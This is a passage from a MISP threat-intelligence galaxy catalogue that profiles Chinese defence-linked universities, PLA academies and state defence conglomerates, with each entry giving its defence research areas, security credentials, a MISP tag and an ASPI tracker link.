The Army Research Institute is an institution devoted to advanced defence research with applications to land warfare. The institute engages in a variety of defence research including radar technology, lasers, and hybrid electric vehicles. Researchers from the institute are known to have collaborated with partners from China’s civilian universities in areas such as advanced manufacturing and automatic control, and laser technology.The Army Research Institute collaborates with civilian companies as part of China’s military-civil fusion program. For example, General Guo Guangsheng from the Army Research Institute made a visit to Hong Run Precision Instruments Co. Ltd. (虹润精密仪器有限公司) on 24 August 2019 to assess how the company was performing in its military-civil fusion activities. Researchers from the Army Research Institute have also been involved in the product design and development of dual-use automobiles as part of a military-civil fusion project called ‘Research, Development and Commerialisation of Advanced Off-road Passenger Vehicles’ (新一代军民通用高端越野乘用汽车研发及产业化). The project included research into vehicles such as the BJ80 military and civilian off-road passenger vehicles as well as the BJ40L off-road vehicle.

The tag is: misp-galaxy:china-defence-universities="Army Research Institute (中国人民解放军陆军研究院)"

Table 580. Table References
Links
https://unitracker.aspi.org.au/universities/army-research-institute

Army Service Academy (中国人民解放军陆军勤务学院)

The Army Service Academy is an institution of higher education in the PLA devoted to training personnel in a variety of logistics disciplines. The logistics disciplines taught at the academy include: fuel logistics, military facility management, military procurement management, and integrated logistics management. Its areas of focus for defence research include military energy engineering, defence engineering, and management science and engineering.

The tag is: misp-galaxy:china-defence-universities="Army Service Academy (中国人民解放军陆军勤务学院)"

Table 581. Table References
Links
https://unitracker.aspi.org.au/universities/army-service-academy

Army Special Operations Academy (中国人民解放军陆军特种作战学院)

The academy’s key subjects include special operations command, surveillance and intelligence, and command information systems engineering.

The tag is: misp-galaxy:china-defence-universities="Army Special Operations Academy (中国人民解放军陆军特种作战学院)"

Table 582. Table References
Links
https://unitracker.aspi.org.au/universities/army-special-operations-academy

Aviation Industry Corporation of China (中国航空工业集团有限公司)

AVIC is a state-owned defence conglomerate established in 2008 that focuses on providing aerospace products for military and civilian customers. AVIC’s main product lines include a variety of aircraft for freight, commercial and military aviation along with other more specialised products such as printed circuit boards, liquid crystal displays and automotive parts, according to Bloomberg. AVIC also provides services to the aviation sector through flight testing, engineering, logistics and asset management.The conglomerate has over 400,000 employees and has a controlling share in around 200 companies. AVIC has over 25 subsidiaries listed on its website.AVIC is the PLA Air Force’s largest supplier of military aircraft, producing fighter jets, strike aircraft, unmanned aerial vehicles and surveillance aircraft. Along with its core work on military aircraft, AVIC also produces surface-to-air, air-to-surface and air-to-air missiles. Its headline projects include the J-10 and the J-11 fighter aircraft. AVIC’s subsidiary, the Shenyang Aircraft Corporation, was responsible for delivery of the J-15 fighter. Another subsidiary of AVIC, the Chengdu Aerospace Corporation, developed the PLA-AF’s J-20 stealth fighter jet.

The tag is: misp-galaxy:china-defence-universities="Aviation Industry Corporation of China (中国航空工业集团有限公司)"

Table 583. Table References
Links
https://unitracker.aspi.org.au/universities/aviation-industry-corporation-of-china

Aviation University of Air Force (中国人民解放军空军航空大学)

AUAF is one of China’s main institutions devoted to the training of air force pilots. Its areas of focus are training in flight command and research into aeronautical engineering. Disciplines taught at AUAF include command science and engineering, aerospace science and technology as well as political work and military command.AUAF scientists publish and attend conferences on radar technology and electronic countermeasures. For example, scientists from AUAF’s Information Countermeasures Division co-authored a publication on radar target recognition with a researcher from the PLA’s Unit 94936 – an aviation unit stationed in Hangzhou. AUAF scientists have also done notable work on complex systems radar and signal pre-sorting.

The tag is: misp-galaxy:china-defence-universities="Aviation University of Air Force (中国人民解放军空军航空大学)"

Table 584. Table References
Links
https://unitracker.aspi.org.au/universities/aviation-university-of-air-force

Beihang University (北京航空航天大学)

Beihang University engages in very high levels of defence research as one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. The university specialises in aviation and spaceflight research. The top four employers of Beihang graduates in 2018 were all state-owned missile or defence aviation companies. In total, 29% of 2018 Beihang graduates who found employment were working in the defence sector.Beihang scientists are involved in the development of Chinese military aircraft and missiles. In 2018, the university signed a comprehensive strategic cooperation agreement with China Aerospace Science and Technology Corporation, a state-owned conglomerate that produces ballistic missiles and satellites. The university is also noteworthy for its leading research on stealth technology.Beihang hosts at least eight major defence laboratories working on fields such as aircraft engines, inertial navigation and fluid dynamics.

The tag is: misp-galaxy:china-defence-universities="Beihang University (北京航空航天大学)"

Table 585. Table References
Links
https://unitracker.aspi.org.au/universities/beihang-university

Beijing Electronic Science and Technology Institute (北京电子科技学院)

BESTI is a secretive university that trains information security experts for the bureaucracy. The institute is the only university run by the CCP General Office, which manages administrative matters for the Central Committee. The General Office is usually run by one of the general secretary’s most trusted aides. It oversees China’s cryptographic and state secrets agency as well as security for the party’s leadership.BESTI has a student population of around 2,000 and has strict admission requirements. Students at the university are scrutinized for their political beliefs, and are typically CCP or Communist Youth League members. The activities of their relatives are screened for political issues. Having no parents or siblings who worked abroad or were involved in ‘illegal organisations’ is a condition of enrolment. The institute claims to count 50 ministerial-level party officials among its 12,000 graduates.BESTI has a close relationship with Xidian University and Beijing University of Posts and Telecommunications. The two universities are its primary collaborators on scientific papers. BESTI runs joint master’s programs with Xidian University in cryptography, information and communication engineering, and computer applications technology. It also has joint doctoral programs with the University of Science and Technology of China and Beijing University of Posts and Telecommunications in cybersecurity.The university runs the Key Laboratory of Information Security (信息安全重点实验室/信息安全与保密重点实验室). Several websites claim that it runs a joint laboratory with the Chinese Academy of Sciences Institute of High Energy Physics, but this could not be confirmed.

The tag is: misp-galaxy:china-defence-universities="Beijing Electronic Science and Technology Institute (北京电子科技学院)"

Table 586. Table References
Links
https://unitracker.aspi.org.au/universities/beijing-electronic-science-and-technology-institute

Beijing Institute of Technology (北京理工大学)

BIT is one of the ‘Seven Sons of National Defence’ supervised by MIIT. It is a leading centre of military research and one of only fourteen institutions accredited to award doctorates in weapons science. In 2017, China’s Ministry of Education ranked BIT and Nanjing University of Science and Technology as the country’s top institutions for weapons science. It has received the most defence research prizes and defence patents out of all China’s universities. 31.80% of BIT graduates in 2018 who found employment were working in the defence sector.BIT’s claimed achievements include producing the PRC’s first light tank, first two-stage solid sounding rocket and first low-altitude altimetry radar. The university also states that it carries out world-class research on several areas of missile technology including “precision strikes, high damage efficiency, maneuver penetration, long-range suppression, and military communications systems and counter-measures”. In 2018, BIT announced that it was running a four-year experimental program training some of China’s top high school students in intelligent weapons systems.BIT is the chair of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器).BIT’s central role in advancing PLA warfighting capability is demonstrated by the fact that it participated in the development of equipment used by 22 of the 30 squads in the 2009 military parade for the 60th anniversary of the founding of the PRC.

The tag is: misp-galaxy:china-defence-universities="Beijing Institute of Technology (北京理工大学)"

Table 587. Table References
Links
https://unitracker.aspi.org.au/universities/beijing-institute-of-technology

Beijing University of Chemical Technology (北京化工大学)

BUCT is subordinate to the Ministry of Education. The university engages in high levels of defence research. In 2016, the Ministry of Education and defence industry agency SASTIND agreed to jointly construct BUCT, a move designed to expand its involvement in defence research.Between 2011 and 2015, the university’s spending on defence research reached RMB272 million (AUD56 million), approximately 15% of the university’s research spending and an increase of around 50% over the previous five years.BUCT specialises in the development and application of critical materials for the defence industry. Its research on carbon fibres has been applied to the aerospace industry.BUCT holds secret-level security credentials, allowing it to participate in classified defence and weapons technology projects.

The tag is: misp-galaxy:china-defence-universities="Beijing University of Chemical Technology (北京化工大学)"

Table 588. Table References
Links
https://unitracker.aspi.org.au/universities/beijing-university-of-chemical-technology

Beijing University of Posts and Telecommunications (北京邮电大学)

BUPT is subordinate to the Ministry of Education in addition to being jointly constructed by the Ministry of Industry and Information Technology. BUPT is one of eight Chinese universities known to have received top-secret security credentials. Since its establishment, the university has focused on information engineering and computer science, and has continued to produce important defence and security technology research.The School of Cyberspace Security is home to one of the university’s two defence laboratories—the Key Laboratory of Network and Information Attack & Defense Technology of Ministry of Education—which carries out research for the Chinese military related to cyber attacks.BUPT is a member of several military-civilian fusion (MCF) alliances and has been awarded for its contributions to MCF and the PLA. During the past three years, major employers of BUPT graduates include the Ministry of State Security, the Ministry of Public Security and MIIT. This suggests a close relationship between BUPT and China’s security and intelligence agencies.

The tag is: misp-galaxy:china-defence-universities="Beijing University of Posts and Telecommunications (北京邮电大学)"

Table 589. Table References
Links
https://unitracker.aspi.org.au/universities/beijing-university-of-posts-and-telecommunications

Central South University (中南大学)

Out of all universities subordinate to the MOE, CSU reportedly receives the most military research funding and was the first to receive a weapons production license. In 2008 and 2011 respectively, the defence industry agency SASTIND and the Ministry of Education (MOE) signed agreements to jointly supervise CSU. Under this arrangement, SASTIND committed to expanding CSU’s involvement in defence research and support the development of its School of Aeronautics and Astronautics and Military Industry Technology Research Institute.CSU’s defence research appears to focus on metallurgy, materials science, and aviation technology, including the development of heat-resistant materials for aeroplane and rocket engines. The university has been involved in the development of China’s first atomic bomb, first intermediate-range ballistic missile, and first nuclear submarine. In 2018, it signed a strategic cooperation agreement with the Chinese Academy of Launch Vehicle Technology, a subsidiary of China Aerospace Science and Technology Corporation that is included on the US BIS Entity List for its involvement in developing rockets.

The tag is: misp-galaxy:china-defence-universities="Central South University (中南大学)"

Table 590. Table References
Links
https://unitracker.aspi.org.au/universities/central-south-university

Changchun University of Science and Technology (长春理工大学)

CUST is primarily supervised by the Jilin Provincial Government but has also been under the administration of SASTIND and its predecessors for over 30 years over its history. The university specialises in photoelectric technology and has a strong focus on defence research. CUST describes itself as having ‘safeguarding national defence as its sublime responsibility and sacred mission.’CUST is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armaments science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器). In April 2018, CUST established the School of Artificial Intelligence (人工智能学院) and the Artificial Intelligence Research Institute (人工智能研究院 ). CUST researchers working on AI are likely involved in research related to facial recognition technology.

The tag is: misp-galaxy:china-defence-universities="Changchun University of Science and Technology (长春理工大学)"

Table 591. Table References
Links
https://unitracker.aspi.org.au/universities/changchun-university-of-science-and-technology

China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)

CARDC claims to be China’s largest aerodynamics research and testing base. It hosts the State Key Laboratory of Aerodynamics (空气动力学国家重点实验室), which includes five wind tunnels and a large computer cluster. CARDC is heavily involved in research on hypersonics.While CARDC is a military unit, its website does not mention this. The PLA officers leading the facility are instead pictured on its website in civilian clothes(pictured: CARDC director, Major General Fan Zhaolin (范召林) in uniform (above) and in civilian attire on CARDC’s website (below).

The tag is: misp-galaxy:china-defence-universities="China Aerodynamics Research and Development Center (中国空气动力研究与发展中心)"

Table 592. Table References
Links
https://unitracker.aspi.org.au/universities/china-aerodynamics-research-and-development-center

China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)

CASIC specialises in defence equipment and aerospace products, particularly short- and medium-range missiles. CASIC is a leading provider to the Chinese military of high-end capabilities such as air-defence, cruise, and ballistic missile systems along with space launch vehicles, micro-satellites and anti-satellite interceptors, according to Mark Stokes and Dean Cheng. CASIC employs over 146,000 employees and is on the Fortune 500 list with revenue exceeding USD37 billion (AUD55 billion).Although defence products form part of CASIC’s main product line, the company also produces products for civilian customers such as electronics, communications equipment and medical equipment. Nevertheless, CASIC claims that it ‘will always uphold its core value of ranking national interests above all’, which indicates that civilian products receive less priority than defence equipment.

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Industry Corporation (中国航天科工集团有限公司)"

Table 593. Table References
Links
https://unitracker.aspi.org.au/universities/china-aerospace-science-and-industry-corporation

China Aerospace Science and Technology Corporation (中国航天科技集团)

CASC was established in 1999 as a defence aerospace conglomerate. The company is primarily focused on ‘developing carrier rockets, various kinds of satellites, … and tactical missile systems.’ With revenues nearing USD38 billion (AUD55 billion), CASC employs nearly 180,000 personnel and is on the Fortune 500 list.PLA experts Mark Stokes and Dean Cheng have noted that CASC’s main products for the PLA include ‘ballistic missiles and space launch vehicles, large solid rocket motors, liquid fuelled engines, satellites, and related sub-assemblies and components.’ The Federation of American Scientists claims CASC is particularly advanced in high-energy propellant technology, satellite applications, strap-on boosters and system integration.CASC maintains an investment business which may be geared towards civilian purposes, according to Bloomberg. The Federation of American Scientists notes that some civilian product lines for CASC include ‘machinery, chemicals, communications equipment, transportation equipment, computers, medical care products and environmental protection equipment.’CASC oversees multiple research academies, which have been separately identified by Mark Stokes and Dean Cheng and by the Nuclear Threat Initiative.The Nuclear Threat Initiative has identified that CASC has the following subordinate companies:

The tag is: misp-galaxy:china-defence-universities="China Aerospace Science and Technology Corporation (中国航天科技集团)"

Table 594. Table References
Links
https://unitracker.aspi.org.au/universities/china-aerospace-science-and-technology-corporation

China Coast Guard Academy (中国人民武装警察部队海警学院)

The China Coast Guard Academy is an institution of higher learning that trains personnel for entry into China’s maritime border defence agency. The academy teaches conducts research and training in maritime law enforcement, warship technology as well as surveillance and intelligence disciplines.The China Coast Guard Academy established the Large Surface Vessel Operation and Simulation Laboratory (大型船艇操纵仿真实验室) in 2016, which focuses on the development of white-hulled boats for the China Coast Guard.

The tag is: misp-galaxy:china-defence-universities="China Coast Guard Academy (中国人民武装警察部队海警学院)"

Table 595. Table References
Links
https://unitracker.aspi.org.au/universities/china-coast-guard-academy

China Electronics Corporation (中国电子信息产业集团有限公司)

CEC is a state-owned conglomerate that produces dual-use electronics. The company was established in 1989 to produce semi-conductors, electronic components, software and telecommunications products. The company describes itself as a defence industry conglomerate.CEC is one of China’s largest companies with nearly 120 thousand employees. CEC claims to hold 22 subordinate enterprises and 14 listed companies. Global Security has provided a list of CEC’s 36 member companies in English.CEC is divided into two operational groups. First is the China Electronics Party Institute (中国电子党校), which provides disciplinary oversight and organises communist party activities within CEC. Second is the Science and Technology Committee (科学技术委员会), which is responsible for research and development within CEC.CEC’s defence electronics are developed by the Military Engineering Department (军工部) within CEC’s Science and Technology Committee. Key defence electronics produced by CEC include tracking stations, radar technology, as well as command and control systems. The company maintains its own office for the management of classified information related to defence research. The Federation of American Scientists has identified CEC’s defence-related enterprises on a list that can be found here.

The tag is: misp-galaxy:china-defence-universities="China Electronics Corporation (中国电子信息产业集团有限公司)"

Table 596. Table References
Links
https://unitracker.aspi.org.au/universities/china-electronics-corporation

China Electronics Technology Group Corporation (中国电子科技集团公司)

CETC is a state-owned defence conglomerate that specialises in dual-use electronics. The company was established in 2002 by bringing dozens of research institutes administered by the Ministry of Information Industry, the predecessor to the Ministry of Industry and Information Technology, under one umbrella.CETC is one of the world’s largest defence companies. It claims to have 523 subordinate units and companies and 160,000 employees.CETC divides its defence electronics products into seven categories: air base early warning, integrated electronic information systems, radar, communication and navigation, electronic warfare, UAVs and integrated IFF (identification, friend or foe). CETC also provides technology used for human rights abuses in Xinjiang, where approximately 1.5m are held in re-education camps.Several CETC research institutes and subsidiaries have been added to the US Government’s entity list, restricting exports to them on national security grounds. CETC has been implicated by the US Department of Justice in at least three cases of illegal exports.CETC has a large international market and has also expanded its international research collaboration in recent years. It has a European headquarters in Graz, Austria, and has invested in the University of Technology Sydney.

The tag is: misp-galaxy:china-defence-universities="China Electronics Technology Group Corporation (中国电子科技集团公司)"

Table 597. Table References
Links
https://unitracker.aspi.org.au/universities/china-electronics-technology-group-corporation

China National Nuclear Corporation (中国核工业集团有限公司)

CNCC is the leading state-owned enterprise for China’s civilian and military nuclear programs. It consists of more than 200 subordinate enterprises and research institutes, many of which are listed on the Nuclear Threat Initiative website. In 2018, CNNC took over China’s main nuclear construction company, China Nuclear Engineering and Construction Group (中国核工业建设集团).The company is organized into eight industrial sectors, including nuclear power, nuclear power generation, nuclear fuel, natural uranium, nuclear environmental protection, application of nuclear technologies, non-nuclear civilian products and new energy sources. CNNC is mainly engaged in research and development, design, construction and production operations in the fields of nuclear power, nuclear fuel cycle, nuclear technology application, and nuclear environmental protection engineering.Because of the dual-use nature of nuclear technologies, the nuclear industry is a typical military-civil fusion industry. Naval nuclear power technology and nuclear reactor technology in the reactor core, fuel assembly, safety and security, and radioactive waste treatment all use the same or very similar processes. In March 2019, CNNC established an military-civil fusion fund dedicated to dual-use nuclear technology research and design.Two CNNC subsidiaries have been added to the US Government’s Entity List, restricting exports to them on national security grounds.CNNC has cooperated with U.S. Westinghouse Electric to construct AP1000 nuclear power plants. The company also has a significant overseas presence, signing agreements for joint research with U.S., French, Canadian, U.K., Russian and Argentinian companies.

The tag is: misp-galaxy:china-defence-universities="China National Nuclear Corporation (中国核工业集团有限公司)"

Table 598. Table References
Links
https://unitracker.aspi.org.au/universities/china-national-nuclear-corporation

China North Industries Group (中国兵器工业集团公司)

Norinco Group was established in 1999 as a state-owned defence conglomerate devoted to the development and production of armaments for Chinese and foreign defence customers. Its main defence products include artillery and tear gas, air defence and anti-missile systems, anti-tank missiles and precision-guided munitions as well as armoured vehicles such as main battle tanks and infantry combat vehicles. Bloomberg reports that Norinco Group’s civilian products include various engineering services and heavy-duty construction equipment. Norinco Group employs over 210,000 personnel, has revenues exceeding US$68.8 billion and is listed on the Fortune 500.Norinco Group has hundreds of subsidiaries and subordinate research institutes in China and around the world that have been catalogued by the International Peace Information Service and Omega Research Foundation in their working paper on the company and on Norinco Group’s website.Norinco Group’s Institute of Computer Application Technology (中国兵器工业计算机应用技术研究所) was one of the first adopters of internet technology and remains a leading company for research into network security. The institute hosts four internet research centres and is reported to work with the National Administration for State Secrets Protection (国家保密局) on the Information Security and Testing and Evaluation Centre (涉密信息系统安全保密测评中心).

The tag is: misp-galaxy:china-defence-universities="China North Industries Group (中国兵器工业集团公司)"

Table 599. Table References
Links
https://unitracker.aspi.org.au/universities/china-north-industries-group

China People’s Police University (中国人民警察大学)

The China People’s Police University is an institution of higher learning devoted to training active duty police officers and firefighters in command and management as well as specialist technical officers. The curriculum is separated into two main streams, one for police officers and the other for firefighters. Its police disciplines include immigrant management, entry-exit and border control management, security intelligence, cyber-security, and political work. Its firefighting disciplines include firefighting engineering, electronic information engineering, and nuclear and biochemical fire control.Research facilities at the university include:

The tag is: misp-galaxy:china-defence-universities="China People’s Police University (中国人民警察大学)"

Table 600. Table References
Links
https://unitracker.aspi.org.au/universities/china-peoples-police-university

China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)

CSIC was established as one of China’s primary state-owned defence companies on 1 July 1999. CSIC is the PLA Navy’s largest supplier of weapons platforms, accounting for nearly 80 per cent of all armaments. CSIC’s signature products include conventional and nuclear submarines, warships and torpedoes, as well as the Liaoning aircraft carrier program.CSIC maintains a civilian shipbuilding program alongside its program of supplying the PLA Navy. CSIC’s civilian work includes the production of oil and chemical tankers, container ships, bulk carriers and engineering ships.On 2 July 2019, it was announced that CSIC and the China State Shipbuilding Corporation would merge. According to Janes Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’ Nikkei has listed some of CSIC’s main subsidiaries here.

The tag is: misp-galaxy:china-defence-universities="China Shipbuilding Industry Corporation (中国船舶重工集团有限公司)"

Table 601. Table References
Links
https://unitracker.aspi.org.au/universities/china-shipbuilding-industry-corporation

China South Industries Group (中国兵器装备集团有限公司)

CSGC is a leading producer of armaments for the People’s Liberation Army. It was founded in 1999 and works on technologies such as advanced munitions, mobile assault weapons, lights armaments, information optoelectronics and counter-terrorism equipment. CSGC also maintains civilian product lines focused on the oil and energy sector, but most of the company’s attention goes to developing armaments. The company employs nearly 200,000 personnel, its revenue approaches USD34 billion (AUD50 billion) and it is listed as a Fortune 500 company.CSGC holds a controlling share in more than 60 subsidiaries. 32 of these are listed on the company’s website.

The tag is: misp-galaxy:china-defence-universities="China South Industries Group (中国兵器装备集团有限公司)"

Table 602. Table References
Links
https://unitracker.aspi.org.au/universities/china-south-industries-group

China State Shipbuilding Corporation (中国船舶工业集团有限公司)

CSCC was established as one China’s primary state-owned weapons companies on 1 July 1999 to build ships for military and civilian customers. CSSC markets itself as as the ‘backbone’ of the Chinese navy and its core products include a variety of warships and support vessels. Alongside its program supporting the PLA Navy, Bloomberg notes that CSSC ‘produces oil tankers, bulk carriers, conditioner vessels, deepwater survey ships, and marine equipment.’On 2 July 2019, it was announced that the China Shipbuilding Industry Corporation and the CSSC would merge. According to Jane’s Defence Weekly, ‘the two groups, which have combined assets of about USD120 billion (AUD178 billion) and employ 240,000 people, dominate naval shipbuilding in China and between them operate 160 subsidiaries.’

The tag is: misp-galaxy:china-defence-universities="China State Shipbuilding Corporation (中国船舶工业集团有限公司)"

Table 603. Table References
Links
https://unitracker.aspi.org.au/universities/china-state-shipbuilding-corporation

China University of Geosciences (Wuhan) (中国地质大学)

CUG is subordinate to the Ministry of Education and also supervised by China’s Ministry of Land and Resources. It is actively engaged in defence research and training on geology, hosting the defence-focused Ministry of Education Key Laboratory on Geological Exploration and Evaluation. The laboratory was established in 2018, has 56 staff, and trains students in ‘military geology’.CUG gained secret-level security credentials in 2009, enabling it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="China University of Geosciences (Wuhan) (中国地质大学)"

Table 604. Table References
Links
https://unitracker.aspi.org.au/universities/china-university-of-geosciences-wuhan

China University of Mining and Technology (中国矿业大学)

CUMT is subordinate to the Ministry of Education and specialises in engineering and other mining and industry-related disciplines. It engages in low levels of defence research.CUMT’s defence research revolves around manufacturing and design, materials science, control science, electronic components, power and energy, and bionics. It appears to be involved in the construction and design of underground bunkers for the military. The academic committee of its State Key Laboratory for Geomechanics and Deep Underground Engineering (深部岩石力学与地下工程国家红点实验室) is headed by PLA underground engineering expert Qian Qihu (钱七虎).

The tag is: misp-galaxy:china-defence-universities="China University of Mining and Technology (中国矿业大学)"

Table 605. Table References
Links
https://unitracker.aspi.org.au/universities/china-university-of-mining-and-technology

Chinese Academy of Engineering Physics (中国工程物理研究院)

CAEP was founded in 1958 and now has over 24,000 employees. It is headquartered in Mianyang, Sichuan Province, but also has facilities in Chengdu and Beijing. Notably, Mianyang is home to a military-civil fusion (MCF) demonstration base—the Sichuan Mianyang High-Technology City. Sichuan Military District Commander Jiang Yongshen (姜永申) in 2016 stressed the important role that Mianyang plays in China’s larger science and technology development and the significance of its military-civil fusion (MCF) demonstration base.The academy is best known for nuclear weapons, but also carries out research on directed-energy weapons. CAEP’s four main tasks are to develop nuclear weapons, research microwaves and lasers for nuclear fusion ignition and directed-energy weapons, study technologies related to conventional weapons, and deepen military-civil fusion. It claims that its research covers 260 specialising, primarily in the broad areas of physics and mathematics, mechanics and engineering, materials and chemistry, electronics and information, and optics and electrical engineering.CAEP hosts part of the Tianhe-2 supercomputer, one of the worlds fastest supercomputers.Despite the sensitivity of its work, CAEP has expanded its international presence in recent years. It claims to send hundreds of scientists overseas to study or work as visiting scholars. CAEP has also used Chinese government talent recruitment schemes such as the Thousand Talents Plan to recruit dozens of scientists from abroad. By 2015, CAEP had recruited 57 scholars through the Thousand Talents Plan, making it one of the largest recruiters of Thousand Talents Plan scholars.CAEP maintains strong collaborative relationships with Chinese civilian universities. It runs a joint laboratory with the University of Electronic Science and Technology of China and collaborates with universities and research institutions including the Chinese Academy of Sciences, the University of Science and Technology of China, Shandong University, Southwest University of Science and Technology, Sichuan University, Jilin University, Peking University and Tsinghua University. CAEP sponsors postgraduate students in many of these institutions who are required to work there for five years after graduating.

The tag is: misp-galaxy:china-defence-universities="Chinese Academy of Engineering Physics (中国工程物理研究院)"

Table 606. Table References
Links
https://unitracker.aspi.org.au/universities/chinese-academy-of-engineering-physics

Chongqing University (重庆大学)

CQU is a leading Chinese research institution subordinate to the Ministry of Education. Chongqing University is home to at least two laboratories devoted to defence research on nanotechnology and control systems. An institution accredited to conduct classified research, Chongqing University is active in improving its security culture with respect to the safeguarding of official secrets.In December 2016, the Ministry of Education entered an agreement with defence industry agency SASTIND to advance military-civil fusion at Chongqing University. Following this agreement, Chongqing University established the defence-focused Ministry of Education Key Laboratory for Complex Systems Safety and Autonomous Control, which works on control systems engineering in May 2018.

The tag is: misp-galaxy:china-defence-universities="Chongqing University (重庆大学)"

Table 607. Table References
Links
https://unitracker.aspi.org.au/universities/chongqing-university

Chongqing University of Posts and Telecommunications (重庆邮电大学)

CQUPT is involved in research on wireless network engineering and testing, next-generation wideband wireless communication, computer networking and information security, intelligent information processing, advanced manufacturing, micro-electronics and specialized chip design. It ranks among the top 100 universities in China for science and technology.The university is supervised by the Ministry of Industry and Information Technology and the Chongqing Municipal Government. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Chongqing University of Posts and Telecommunications (重庆邮电大学)"

Table 608. Table References
Links
https://unitracker.aspi.org.au/universities/chongqing-university-of-posts-and-telecommunications

Chongqing University of Technology (重庆理工大学)

CQUT is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). However its involvement in defence research does not appear as expansive as the other B8 members and it is a relatively low-ranked university. In 2017, its president stated that ‘Chongqing is an important site for the weapons industry, but its military-industrial research and development ability has not yet upgraded.’ Unlike the other members of the B8, SASTIND does not appear to supervise the university.The university has links to Norinco Group and China South Industries Group, China’s largest weapons manufacturers, and was under the supervision of the conglomerates’ predecessor, China Ordnance Industry Corporation, until 1999. In 2017 and 2018, it signed a partnerships with four local defence companies to collaborate on research and training.In 2011, CQUT received secret-level security credentials, enabling it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="Chongqing University of Technology (重庆理工大学)"

Table 609. Table References
Links
https://unitracker.aspi.org.au/universities/chongqing-university-of-technology

Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)

COMAC was established in 2008 as a state-owned manufacturer of large commercial aircraft. The company oversees eleven subsidiaries that focus on various aspects of aircraft production. A list of COMAC’s subordinate companies can be found in English on the company’s website.Despite its focus on commercial aircraft, China’s Ministry of Industry and Information Technology has referred to it as a defence industry conglomerate. The company maintains strong links to China’s defence industry and some of its leadership is drawn from former executives at state-owned military aircraft and missile manufacturers. China’s leading producer of military aircraft, the Aviation Industry Corporation of China (AVIC), also holds a 10 per cent share in COMAC. COMAC supports the continued development of China’s defence industry by awarding ‘national defence technology scholarships’ to Chinese university students.COMAC’s signature passenger aircraft, the C919, offers an example of how the company could use its civilian aircraft production for military purposes. Numerous Chinese analysts have studied Boeing’s conversion of the 737 into the P-8 Poseidon and E-7A surveillance aircraft and argue that the C919 could also be retrofitted for early warning as well as anti-surface and anti-submarine warfare missions. With a greater flight range than China’s other military aircraft, a retrofitted C919 for maritime surveillance operations could reduce China’s dependence on artificial air bases in the South China Sea which currently render aircraft vulnerable to corrosion due to harsh weather conditions. Vice-Chairman of the Central Military Commission, Zhang Youxia, reportedly expressed an interest in learning from American companies in converting civilian aircraft into military aircraft while inspecting COMAC’s C919.

The tag is: misp-galaxy:china-defence-universities="Commercial Aircraft Corporation of China (中国商用飞机有限责任公司)"

Table 610. Table References
Links
https://unitracker.aspi.org.au/universities/commercial-aircraft-corporation-of-china

Criminal Investigation Police University of China (中国刑事警察学院)

CIPUS was founded in May 1948 and underwent several name changes, but was upgraded in 1981 to become the first police university offering a specialised undergraduate degree program. It runs a national engineering laboratory, two MPS key laboratories, and provincial key laboratories. It is focused on training in criminal investigation, criminology science and technology and criminal law.The university also has relationships with companies that provide the technological tools that contribute to the PRC’s public security apparatus. For instance, it has a relationship with the company Haiyun Data on public security intelligence. Haiyun provides data visualization services for MPS bureaus across China.

The tag is: misp-galaxy:china-defence-universities="Criminal Investigation Police University of China (中国刑事警察学院)"

Table 611. Table References
Links
https://unitracker.aspi.org.au/universities/criminal-investigation-police-university-of-china

Dalian Minzu University (大连民族大学)

DLMU was established in 1984 as an institution that researches China’s ethnic minorities. The university is overseen by the State Ethnic Affairs Commission (SEAC), the Liaoning Provincial Government and the Dalian Municipal Government.Scientific disciplines taught by DLMU include communications and information engineering, machine engineering, civil engineering and environmental science. DLMU also researches political thought and minority groups of northeast China.DLMU currently hosts the Dalian Key Lab of Digital Technology for National Culture (大连市民族文化数字技术重点实验室). Researchers at laboratory carry out research on facial recognition of ethnic minorities. The laboratory has collaborated with an academic from Curtin University on research related to the facial recognition of Tibetans, Koreans and Uyghurs—over one million of whom have disappeared into re-education camps. DLMU researchers are working on a database of facial and optical movements across different ethnic groups.DLMU also hosts the State Ethnic Affairs Commission Key Laboratory of Intelligent Perception and Advanced Control (国家民委智能感知与先进控制重点实验室), housed within the university’s College of Electromechanical Engineering (机电工程学院). The laboratory has done work on convolutional neural networks for visual image recognition, which could have applications for surveillance technology.DLMU’s party committee has an active United Front Work Department. The department supervises non-CCP members and students returning from overseas study. Management of religious and ethnic minorities are likely to be other priorities for the department.

The tag is: misp-galaxy:china-defence-universities="Dalian Minzu University (大连民族大学)"

Table 612. Table References
Links
https://unitracker.aspi.org.au/universities/dalian-minzu-university

Dalian Naval Academy (中国人民解放军海军大连舰艇学院)

The Dalian Naval Academy is one of the main training colleges for junior officers and cadets in the PLA Navy. The academy focuses on maritime navigation technology, communications engineering, electronic information engineering, weapons systems engineering, surveying and control science.Scientists from the Dalian Naval Academy produce publications on a variety of defence topics, including:

The tag is: misp-galaxy:china-defence-universities="Dalian Naval Academy (中国人民解放军海军大连舰艇学院)"

Table 613. Table References
Links
https://unitracker.aspi.org.au/universities/dalian-naval-academy

Dalian University of Technology (大连理工大学)

